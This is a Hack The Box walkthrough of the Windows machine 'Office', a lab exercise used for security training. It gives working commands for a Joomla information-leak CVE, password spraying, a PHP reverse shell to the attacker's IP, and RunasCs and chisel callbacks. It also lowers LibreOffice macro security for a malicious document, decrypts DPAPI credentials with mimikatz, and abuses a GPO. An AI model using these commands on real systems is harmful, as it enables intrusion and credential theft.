HTB | Office

This is a Windows box. You can find it here.

Skill Learned

  • Joomla Web Service Abuse

  • CVE-2023-23752

  • WireShark Packet Filtering

  • RunasC

  • LibreOffice Registry Security

  • DPAPI

  • Abusing MS-BKRP (BackupKey Remote Protocol) for Password Decryption

  • GPO Abuse (via SharpGPOAbuse.exe)

NMAP

IP: 10.10.11.3

Port 53

dig any @10.10.11.3 office.htb

from this, we can say there are

  • office.htb

  • dc.office.htb

  • hostmaster.office.htb

Let's add this to /etc/hosts

Let's try zone transfer, but zone transfer is not possible

dig axfr @10.10.11.3

LDAP

ldapsearch -H ldap://10.10.11.3 -x -s base namingcontexts
ldapsearch -H ldap://10.10.11.3 -x -b "DC=office,DC=htb"

nothing interesting was found on ldapsearch

SMB 445

netexe confirms the host and domain

netexec smb 10.10.11.3

not able to perform any unauthenticated enumeration

netexec smb 10.10.11.3 -u guest -p ''
netexec smb 10.10.11.3 -u test -p test
netexec smb 10.10.11.3 -u test -p ''

Port 80

Let's visit port 80

dirsearch

 dirsearch -u http://office.htb/ -x 403,404

Let's visit /robots.txt

The website is on Joomla We can find its version at http://office.htb/administrator/manifests/files/joomla.xml

It is version 4.2.7

Let's look for an exploit

Foothold/shell

Auth as dwolfe

Leak Password

I found the CVE-2023-23752, and according to the blog post, CVE-2023-23752 is an authentication bypass resulting in an information leak. We can do this by curl -v http://office.htb/api/index.php/v1/config/application?public=true

or visiting the webpage with the URL

from this, we found the password H0lOgrams4reTakIng0Ver754! That password was not working anywhere

Generate User List

Since we have a password let's use kerbrute to find the username

./kerbrute userenum --dc 10.10.11.3 -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 100

Password Spray

now we have a username list and password we can password-spray

netexec smb 10.10.11.3 -u username -p 'H0lOgrams4reTakIng0Ver754!' --continue-on-success

There’s a hit on dwolfe. No matches on WinRM:

RCE as web_account

Enumeration

netexec smb 10.10.11.3 -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' --shares

found pcap file in SOC Analysis share

Latest-System-Dump-8fbc124d.pcap

I will download the file and open it in Wireshark for analysis

Open Statictic -> Endpoints

Looks like 10.250.0.0/24 is the internal network.

most traffic is from 10.250.0.30

Kerberos

Now let's analyse the conversation (Statistic -> Conversation) here we can see the conversation between 10.250.0.41 and 10.250.0.30 over port 88. This might be a Kerberos authentication conversation

We can see two AS-REQ requests from 10.250.0.41

The first request does not have any data but the second request has

This packet includes a timestamp encrypted by the tstark user.

Crack Hash

I found this article which shows how to Get Passwords From Kerberos Pre-Authentication Packets

I will now create the hash

now I will use hashcat to crack the hash

hashcat -m 19900 tstark_hash /home/anurag/stuff/rockyou.txt

This password only worked for smb but we didn't find anything on the shares

This password worked on Joomla website with the administrator username

RCE

I’ll click on System and select “Site Templates”, and then “Cassiopeia Details and Files”. I’ll edit index.php, and after making a change in a comment to make sure I have permissions (I do)

Now I will add a shell(refer to revshell.com) in index.php.

and it works

I tried php -r '$sock=fsockopen("10.10.14.5",1234);system("sh<&3 >&3 2>&3");' but the connection was getting close as soon it gets connected

Shell as TSTARK

Upload RunasC

Now I'll try to get the shell as tstark directly and for that I will use RunasCs. I’ll host RunasCs on my Python webserver, and download it to programdata:

We can cross-check that r.exe is copied

Shell

I’ll send ?cmd=C:\programdata\r.exe tstark playboy69 cmd.exe -r 10.10.14.5:1234, and I get a shell:

found user.txt

Priv Esc

Shell as PPotts

Let's look at the what privileges and groups tstark users is part of

whoami /priv
whoami /groups

Here we can see tstark is a part of OFFICE\Registry Editors group

That’s a custom group for Office, but it seems to imply that TStark can edit at least parts of the registry.

Internal Website - port 8083

In C:\xampp\apache\conf\httpd.conf, I’ll find the setup of the virtual host for this site:

The applications directory is empty, but it is owned by the PPotts user, and web_account has access to write to it:

since port 8083 is hosted internally I will upload chisel to the office box

wget 10.10.14.5:80/chisel_1.10.1_windows_amd64 -outfile c.exe

And start the server on my host. Now I’ll connect back:

PS C:\ProgramData> .\c.exe client 10.10.14.5:8000 R:8083:127.0.0.1:8083
./chisel server --port 8000 --reverse

Now i can visit http://127.0.0.1:8083

There is a page /resume.php where we can upload resume

I tried uploading test.txt but got an error

If I try with the allowed extension it gets uploaded, Let's try the test.odt

Shell via Macros

This wiki page documents the MacroSecurityLevel registry key that shows the current settings:

Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

Based on this page value 3 is very high, so we have to trim it down to 0

ACL on this registry shows that "Registry Editor" have full control

(Get-ACL HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel).Access

I'll update the value to 0

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" -Name "Value" -Value 0
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

Create a Malicious Document

I will use msfconsole to generate the .odt file

Now I will run and upload the msf.odt on the website

We have to check the MacrSecurity value because it gets set back to 3 after some time.

and after some time we have meterpreter shell

and we are ppots

Shell as hhogan

cmdkey /list will show us any saved cred on the system with the current account

Here we can see user hhogan's password

and hhogan is a GPO Manager

The system level cred are stored by DPAPI here

gci -force AppData\Roaming\Microsoft\Credentials

the master key for these are stored here

gci -force AppData\Roaming\Microsoft\Protect

Decrypt Credential — Decrypt Master Key

The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.

Let's upload mimikatz to the box

Now we have to get the key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

we have the key at the end. Now Let's try this key on all three creds

The first one is for MyUser

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

second is for hhogan

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

and 3rd one give error

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\E76CCA3670CD9BB98DF79E0A8D176F1E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Now we have hhogan's cred, Let's winrm using that

Winrm

We can smb and winrm using the cred

now use evil-winrm to get shell

Shell as Administrator

Since hhogan is a GPO Manager

We can look for GPO

Get-GPO -All | Select-Object DisplayName

GPO Abuse

Now to abuse GPO we can use SharepGPOAbuse I have downloaded the exe from this repo

Let's upload the exe

Let's start with the first GPO,

.\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Windows Firewall GPO"

and it is not writable, Let's try the second one

.\SharpGPOAbuse.exe --AddLocalADmin --UserAccount HHogan --GPOName "Default Domain Policy"

We were able to abuse the second group policy "Default Domain Policy" to add hhogan as new local admin.

This doesn’t take effect until the GPO refreshes. HHogan has permission to run gpupdate /force which will make that happen now:

and hhogan is the administrator

after reconnecting I was able to get root.txt

PreviousHTB | AuthorityNextHTB | Devel

Last updated